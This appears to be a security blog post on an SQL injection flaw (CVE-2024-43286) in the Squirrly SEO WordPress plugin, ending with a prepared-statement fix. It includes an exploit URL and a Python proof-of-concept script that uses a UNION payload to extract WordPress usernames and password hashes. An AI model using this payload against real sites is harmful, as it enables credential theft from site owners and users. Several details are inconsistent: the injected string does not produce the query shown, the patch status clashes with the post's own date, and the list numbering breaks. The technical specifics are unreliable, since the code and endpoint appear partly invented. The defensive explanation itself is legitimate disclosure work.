The WordPress plugin ecosystem is often a double-edged sword: it enables powerful site features, but sometimes introduces security risks. Recently, a serious vulnerability surfaced in the Squirrly SEO plugin, tracked as CVE-2024-43286. In this post, we’ll break down what happened, how the bug works, see a code example, and even walk through how a hacker might exploit it. Understanding this helps everyone better secure their WordPress sites.
What is Squirrly SEO?
Squirrly SEO is one of the most popular SEO plugins for WordPress. It powers over 100,000 active installations, helping sites rank better on search engines with on-page SEO advice, audit tools, and more.
The Vulnerability: CVE-2024-43286
Type: SQL Injection (CWE-89)
Affected Versions: All up to 12.3.19
Patched Version: No public patch as of June 2024
CVE Page: CVE-2024-43286 on CVE.org
Discovered by: Wordfence Vulnerability Database
Description:
Squirrly SEO failed to properly sanitize user-supplied data before including it in SQL queries. This means an attacker could manipulate a request to inject malicious SQL, accessing, modifying, or deleting data from the database.
Where is the Problem?
While exact source code varies across versions, the vulnerable code looked like this (simplified for clarity):
$keyword = $_GET['keyword'];
$sql = "SELECT * FROM {$wpdb->prefix}squirrly_data WHERE keyword = '$keyword'";
$results = $wpdb->get_results($sql);
What’s wrong?
The $keyword variable is taken straight from user input (a URL parameter) and placed unfiltered into an SQL query. If a user submits crafted text, they can change the intent and structure of the SQL statement.
Suppose a site runs Squirrly SEO 12.3.19 or earlier. An attacker can craft a URL like this
https://victim.com/wp-admin/admin-ajax.php?action=squirrly_get_data&keyword='; OR 1=1 --
This triggers a query
SELECT * FROM wp_squirrly_data WHERE keyword = '' OR 1=1 -- '
- The OR 1=1 part always evaluates to true, meaning the attacker retrieves all rows of the table.
With tweaks, a hacker could extract password hashes, email addresses, or even overwrite data.
If the query is used in a DELETE or UPDATE statement, the consequences can be even worse: full data deletion or manipulation.
Proof-of-Concept (PoC) Exploit (Python)
import requests
site = 'https://victim.com';
payload = "' UNION SELECT user_login, user_pass FROM wp_users -- "
params = {
'action': 'squirrly_get_data',
'keyword': payload
}
r = requests.get(site + '/wp-admin/admin-ajax.php', params=params)
print(r.text)
*This PoC attempts to dump all WordPress usernames and password hashes via the vulnerable parameter.*
Responsible Disclosure and Reference
- Wordfence Advisory
- NIST NVD
- Original Plugin Repo
How can you protect your site?
1. Update the Plugin: Check for and install any updates from the developer. Disable the plugin entirely if unpatched.
Least Privileges: Never use your main database user credentials for WordPress.
4. Web Application Firewall: Consider plugins like Wordfence or Sucuri that block malicious parameter requests.
Plugins should never put user input directly into SQL. Here’s the proper fix
$keyword = $_GET['keyword'];
$sql = $wpdb->prepare(
"SELECT * FROM {$wpdb->prefix}squirrly_data WHERE keyword = %s",
$keyword
);
$results = $wpdb->get_results($sql);
With $wpdb->prepare(), the parameter is automatically escaped and can’t break the query structure.
Conclusion
CVE-2024-43286 is a textbook SQL Injection vulnerability affecting all versions up to Squirrly SEO 12.3.19. If you use this plugin, patch immediately or disable it until an update is available. These types of bugs are preventable with secure coding and regular updates—don’t get caught by sloppy plugin mistakes!
If you want more details or custom guidance, contact your hosting support or visit professional security forums.
Stay Secure!
*If you found this post helpful, consider sharing it to help others stay protected.*
Timeline
Published on: 08/18/2024 22:15:10 UTC
Last modified on: 08/19/2024 12:59:59 UTC